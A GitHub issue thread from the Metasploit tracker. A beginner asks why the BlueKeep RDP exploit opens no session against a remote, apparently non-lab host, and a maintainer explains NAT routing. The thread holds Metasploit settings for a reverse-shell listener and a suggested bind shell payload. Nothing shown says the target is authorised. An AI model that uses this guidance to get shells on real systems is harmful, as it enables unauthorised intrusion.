bluekeep no session

[PratikDahal7]

I'm trying to exploit BLUEKEEP on remote computer (Not VM) and the target is also vulnerable. But every time no session is created, WHy? I'm noob with 0 knowledge in this field...help!! command i ran: (I have metasploit installed in Windows)

set rhost: 40.122.. set rport: 3389 (default) then run... but ended up with no session. lhost and lport was set by metasploit itself.. which is same as shown in ipconfig of listener. and payload is reverse_tcp

I searched this issue and found: 1) it is due to GROOMBASE and GROOMSIZE 2) Network issue

and tried to changing groomsize from 250 to 100 but no luck and groombase to "set target 1 to 8" and what does it mean network issue? should payload be different to exploit remote PC or lhost and lport should be different or rdp_client_ip must be different , it set default, with address 192.168.0.100

and after a while, exploited successful but no session? and also we need to adjust NPP? and command to find NPP on windows?? https://pentest-tools.com/blog/bluekeep-exploit-metasploit/

HELP Me!!

[bcoles]

set rhost: 40.122..

A remote host cannot establish a reverse connection to your lhost of 192.168.113.254 on your LAN.

Try a bind payload or configure IP forwarding and set ReverseListenerBindAddress andReverseListenerBindPort.

[PratikDahal7]

set rhost: 40.122..

A remote host cannot establish a reverse connection to your lhost of 192.168.113.254 on your LAN.

Try a bind payload or configure IP forwarding and set ReverseListenerBindAddress andReverseListenerBindPort.

can you explain in detail? which address and port should be used in ReverseListenerBindAddress and ReverseListenerBindPort . my external ip? & which port? sorry for asking like noob (:

[bcoles]

It is a network routing issue. See:

• https://www.corelan.be/index.php/2014/01/04/metasploit-meterpreter-and-nat/

Set LHOST and LPORT to your public IP and public port. These will be used by the payload for the connect back.

Set ReverseListenerBindAddress and ReverseListenerBindPort to your local IP and local port on the host running Metasploit.

set LHOST                        <your public IP address which your target will connect to>
set LPORT                        <your public port which your target will connect to>
set ReverseListenerBindAddress   <your local IP address for a network interface>
set ReverseListenerBindPort      <a port on the local network interface>

Ensure port LPORT is forwarded from your border gateway to ReverseListenerBindAddress:ReverseListenerBindPort.

[PratikDahal7]

It is a network routing issue. See:

• https://www.corelan.be/index.php/2014/01/04/metasploit-meterpreter-and-nat/

Set LHOST and LPORT to your public IP and public port. These will be used by the payload for the connect back.

Set ReverseListenerBindAddress and ReverseListenerBindPort to your local IP and local port on the host running Metasploit.

set LHOST                        <your public IP address which your target will connect to>
set LPORT                        <your public port which your target will connect to>
set ReverseListenerBindAddress   <your local IP address for a network interface>
set ReverseListenerBindPort      <a port on the local network interface>

Ensure port LPORT is forwarded from your border gateway to ReverseListenerBindAddress:ReverseListenerBindPort.

bro i am behind NAT so.. i tried using ngrok to portforward but no success? you'd mention earlier that we can use either portforwarding or bind payload. how to use bind payload

[bcoles]

how to use bind payload

The same way you would set any other payload. The easiest approach is to use tab auto completion with set payload <tab><tab> and select a suitable payload, such as windows/meterpreter/bind_tcp.

In order for a bind payload to work, the lport on the target host must be unused. In order to connect to the bind shell, the firewall must permit remote connections to the bound port.

The Metasploit issue tracker is for tracking issues with Metasploit. Perhaps someone on Slack can help you out with your questions:

• https://www.metasploit.com/help

[github-actions[bot]]

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

[github-actions[bot]]

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.